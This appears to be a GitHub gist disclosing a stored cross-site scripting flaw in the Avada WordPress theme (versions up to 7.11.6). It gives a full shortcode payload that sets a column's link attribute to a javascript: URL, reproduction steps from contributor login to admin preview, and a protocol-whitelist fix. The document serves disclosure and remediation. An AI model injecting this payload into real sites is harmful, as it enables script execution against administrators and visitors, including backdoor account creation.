Skip to content

Instantly share code, notes, and snippets.

@Xib3rR4dAr

Xib3rR4dAr/Avada_7.11.6_Contributor_Stored_XSS.md Secret

Last active March 1, 2024 23:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Xib3rR4dAr/d3c36f7befe7d380ed240d3cb141d64c to your computer and use it in GitHub Desktop.
Save Xib3rR4dAr/d3c36f7befe7d380ed240d3cb141d64c to your computer and use it in GitHub Desktop.
Download ZIP
Avada <= 7.11.6 Contributor+ Stored XSS (fusion_builder_column)
Raw
Avada_7.11.6_Contributor_Stored_XSS.md

Avada <= 7.11.6 Contributor+ Stored XSS

Exploit Author: Muhammad Zeeshan (Xib3rR4dAr)

Description:

The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Stored Cross-Site Scripting via fusion_builder_column shortcode in versions up to, and including, 7.11.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. While creating a button, Avada allows to add attributes to a button, which can be exploited to perform XSS. By exploiting XSS attacker can perform actions on behalf of other users like create new backdoor admin account when admin views the form.
link parameter/attribute in fusion_builder_column shortcode can be set to contain javascript protocol which would allow execution of custom JS when column is clicked.

link="javascript:alert(&#x27;XSS&#x27;)"

Reproduction Steps:

  1. Login as contributor user
  2. Visit http://192.168.253.1/wp-admin/post-new.php
  3. Enter any name for Post Title
  4. In editor, "Text" tab would already be selected, if not then click "Text" tab and paste:
[fusion_builder_container type="flex" hundred_percent="no" hundred_percent_height="no" hundred_percent_height_scroll="no" align_content="stretch" flex_align_items="flex-start" flex_justify_content="flex-start" flex_wrap="wrap" hundred_percent_height_center_content="yes" equal_height_columns="no" container_tag="div" hide_on_mobile="small-visibility,medium-visibility,large-visibility" status="published" border_style="solid" box_shadow_blur="0" box_shadow_spread="0" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="center center" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" fade="no" background_parallax="none" enable_mobile="no" parallax_speed="0.3" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" video_mp4="" video_webm="" video_ogv="" video_url="" video_aspect_ratio="16:9" video_loop="yes" video_mute="yes" video_preview_image="" pattern_bg="none" pattern_custom_bg="" pattern_bg_color="" pattern_bg_style="default" pattern_bg_opacity="100" pattern_bg_size="" pattern_bg_blend_mode="normal" mask_bg="none" mask_custom_bg="" mask_bg_color="" mask_bg_accent_color="" mask_bg_style="default" mask_bg_opacity="100" mask_bg_transform="left" mask_bg_blend_mode="normal" render_logics="" logics="" absolute="off" absolute_devices="small,medium,large" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_background_color="" sticky_height="" sticky_offset="" sticky_transition_offset="0" scroll_offset="0" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0"][fusion_builder_row][fusion_builder_column type="1_1" layout="1_1" align_self="auto" content_layout="column" align_content="flex-start" valign_content="flex-start" content_wrap="wrap" spacing="" center_content="no" column_tag="div" link="javascript:alert(&#x27;XSS&#x27;)" target="_self" link_description="" min_height="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" sticky_display="normal,sticky" class="" id="" type_medium="" type_small="" flex_grow_medium="" flex_grow_small="" flex_grow="" flex_shrink_medium="" flex_shrink_small="" flex_shrink="" order_medium="0" order_small="0" spacing_left_medium="" spacing_right_medium="" spacing_left_small="" spacing_right_small="" spacing_left="" spacing_right="" margin_top_medium="" margin_bottom_medium="" margin_top_small="" margin_bottom_small="" margin_top="" margin_bottom="" padding_top_medium="" padding_right_medium="" padding_bottom_medium="" padding_left_medium="" padding_top_small="" padding_right_small="" padding_bottom_small="" padding_left_small="" padding_top="" padding_right="" padding_bottom="" padding_left="" hover_type="none" border_sizes_top="" border_sizes_right="" border_sizes_bottom="" border_sizes_left="" border_color_hover="" hue="" saturation="" lightness="" alpha="" border_color="" border_style="solid" border_radius_top_left="" border_radius_top_right="" border_radius_bottom_right="" border_radius_bottom_left="" box_shadow="no" box_shadow_vertical="" box_shadow_horizontal="" box_shadow_blur="0" box_shadow_spread="0" box_shadow_color="" box_shadow_style="" z_index_hover="" z_index="" overflow="" background_type="single" background_color_medium="" background_color_small="" background_color_medium_hover="" background_color_small_hover="" background_color_hover="" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" background_image_id_medium="" background_image_id_small="" background_image_id="" lazy_load="none" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="left top" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" render_logics="" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_offset="" absolute="off" absolute_top="" absolute_right="" absolute_bottom="" absolute_left="" filter_type="regular" filter_hover_element="self" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" transform_type="regular" transform_hover_element="self" transform_scale_x_hover="1" transform_scale_y_hover="1" transform_translate_x_hover="0" transform_translate_y_hover="0" transform_rotate_hover="0" transform_skew_x_hover="0" transform_skew_y_hover="0" transform_scale_x="1" transform_scale_y="1" transform_translate_x="0" transform_translate_y="0" transform_rotate="0" transform_skew_x="0" transform_skew_y="0" transform_origin="" transition_duration="300" transition_easing="ease" transition_custom_easing="" motion_effects="W10=" scroll_motion_devices="small-visibility,medium-visibility,large-visibility" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" last="true" border_position="all" first="true"][fusion_pricing_table type="1" backgroundcolor="" hue="" saturation="" lightness="" alpha="" background_color_hover="" bordercolor="" dividercolor="" heading_color_style_1="" heading_color_style_2="" pricing_color="" body_text_color="" margin_top="" margin_right="" margin_bottom="" margin_left="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" class="" id="" columns="2"][fusion_pricing_column title="Standard" standout="no"][fusion_pricing_price currency="$" currency_position="left" price="15.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][fusion_pricing_column title="Premium" standout="yes"][fusion_pricing_price currency="$" currency_position="left" price="25.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][/fusion_pricing_table][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]
  1. Click "Submit for review"
  2. Logout from contributor user
  3. Login as administrator user
  4. Visit http://192.168.253.1/wp-admin/edit.php
  5. Click "preview" on post created by contributor user
  6. Clicking anywhere inside column, eg on table would trigger XSS.

Author and other users can directly publish a post having XSS in shortcode and then XSS will trigger when any visiting user visits the post and clicks inside the column.

Fix:

Allow whitelisted protocols like http/https only in link attribute of fusion_builder_column

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment